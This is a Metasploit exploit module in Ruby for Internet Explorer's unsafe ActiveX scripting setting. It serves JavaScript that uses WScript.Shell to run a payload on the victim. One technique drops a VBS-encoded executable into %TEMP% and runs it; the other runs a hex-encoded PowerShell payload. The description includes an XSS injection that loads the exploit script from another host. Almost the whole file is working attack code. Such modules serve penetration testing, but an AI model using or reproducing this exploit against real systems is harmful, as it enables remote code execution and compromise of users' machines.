##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/util/exe'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',
      'Description'    => %q{
        This exploit takes advantage of the "Initialize and script ActiveX controls not
      marked safe for scripting" setting within Internet Explorer.  When this option is set,
      IE allows access to the WScript.Shell ActiveX control, which allows javascript to
      interact with the file system and run commands.  This security flaw is not uncommon
      in corporate environments for the 'Intranet' or 'Trusted Site' zones.

        When set via domain policy, the most common registry entry to modify is HKLM\
      Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,
      which if set to '0' forces ActiveX controls not marked safe for scripting to be
      enabled for the Intranet zone.

        This module creates a javascript/html hybrid that will render correctly either
      via a direct GET http://msf-server/ or as a javascript include, such as in:
      http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js>
      </script>.

        IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
      an x64 iexplore.exe.
      },

      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'natron',
          'Ben Campbell' # PSH and remove ADODB.Stream
        ],
        'References'     =>
        [
          [ 'URL', 'http://support.microsoft.com/kb/182569' ],
          [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
          [ 'URL', 'http://support.microsoft.com/kb/870669']
        ],
        'DisclosureDate' => 'Sep 20 2010',
        'Platform'       => 'win',
        'Targets'	 =>
          [
            [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' =>
          {
            'HTTP::compression' => 'gzip'
          },
        'DefaultTarget'  => 0))

    register_options(
        [
            OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
        ], self.class
    )
  end

  def on_request_uri(cli, request)

    # Build out the HTML response page
    var_shellobj		= rand_text_alpha(rand(5)+5)

    p = regenerate_payload(cli)
    if datastore['TECHNIQUE'] == 'VBS'
      js_content = vbs_technique(var_shellobj, p)
    else
      js_content = psh_technique(var_shellobj, p)
    end

    print_status("Request received for #{request.uri}")
    print_status("Sending exploit html/javascript");

    # Transmit the response to the client
    send_response(cli, js_content, { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

  def vbs_technique(var_shellobj, p)
    var_fsobj               = rand_text_alpha(rand(5)+5)
    var_fsobj_file          = rand_text_alpha(rand(5)+5)
    var_vbsname             = rand_text_alpha(rand(5)+5)
    var_writedir            = rand_text_alpha(rand(5)+5)

    exe = generate_payload_exe({ :code => p.encoded })
    vbs = Msf::Util::EXE.to_exe_vbs(exe)
    vbs_content =  Rex::Text.to_hex(vbs)

    # Build the javascript that will be served
    js_content  = %Q|
//<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
var #{var_fsobj}    = new ActiveXObject("Scripting.FileSystemObject");
var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);

#{var_fsobj_file}.Write(unescape("#{vbs_content}"));
#{var_fsobj_file}.Close();

#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
//</script></html>
|
    return js_content
  end

  def psh_technique(var_shellobj, p)
    cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
    js_content = %Q|
//<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
//</script></html>
|

    return js_content
  end
end